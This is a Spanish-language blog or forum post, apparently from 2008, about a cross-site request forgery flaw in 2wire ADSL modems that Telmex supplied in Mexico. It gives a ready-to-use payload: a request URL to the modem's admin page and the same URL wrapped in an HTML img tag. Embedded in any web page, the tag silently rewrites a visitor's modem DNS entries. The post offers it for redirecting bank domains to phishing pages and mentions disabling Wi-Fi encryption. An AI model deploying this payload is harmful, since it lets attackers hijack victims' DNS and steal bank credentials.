DNS Poisoning en Modems 2wire
Hace unos meses se dio a conocer una vulnerabilidad en los modem 2wire, los modem de adsl que da telmex para su servicio de inifnitum en todo México.
Pues resulta que si no tenemos puesto password de administrador, la mayoria no lo pone, podemos remotamente acceder a las tablas de resolución de nombres DNS y modificarlas remotamente.
El ataque consiste en hacer que nuestra victima navegue por una url previamente modificada por nostros. y Listo, si su modem no tienen contraseña, podremos lograr que los dominios que queramos resuelvan a direccion no legitimas.
Con esto se pueden lograr ataques de phishing, imagenense escribir en su navegador www.banamex.com.mx y que los lleve a una pagina exactamente igual a la de banamaex pero modificada para robar su cuenta bancaria? PELIGROSO verdad!!
Les dejo la manera de incluir el ataque en cualquier pagina html
Esta es la instrucción normal para agregar un sitio a la tabla DNS del modem 2Wire
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAM
E=www.esimio.org&ADDR=64.233.187.99
Con esto le estamos inyectado como parametros que resuelva el nombre de dominio esimio.org a la IP 64.233.187.99
y si eso lo ponemos como si fuera una llamada a una imagen en html queda asi
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.esimio.org&ADDR=64.233.187.99 alt=''>
Con tan solo navegar en una pagina que tenga el codigo arriba mencionado la configuracion DNS de nuestro 2wire cambiará. y ahora al querer acceder a esimio.org accederan a google directamente ya que tiene prioridad la resolucion de nombre del 2wire a la de los DNS de prodigy.
Tambien hay infinidad de parametros que pueden ser inyectados al 2wire
como desactivar el wep al wifi, Establecer una contraseña para el admin, Tiene casi control total sobre el modem afectado
Fuente: http://www.hakim.ws
Que les parece esto? Realmente peligroso no?
Posts: 16
Reply #15 on : Sat August 16, 2008, 21:37:49
Posts: 16
Reply #14 on : Mon July 07, 2008, 20:08:32
Posts: 16
Reply #13 on : Mon July 07, 2008, 20:08:28
Posts: 16
Reply #12 on : Mon July 07, 2008, 20:07:38
Posts: 16
Reply #11 on : Mon July 07, 2008, 20:07:34
Posts: 16
Reply #10 on : Mon July 07, 2008, 20:07:25
Posts: 16
Reply #9 on : Mon July 07, 2008, 20:00:23
Posts: 16
Reply #8 on : Mon July 07, 2008, 20:00:08
Posts: 16
Reply #7 on : Mon July 07, 2008, 19:59:22
Write a comment
- Required fields are marked with *.
Posts: 16
Reply #16 on : Mon August 25, 2008, 04:15:23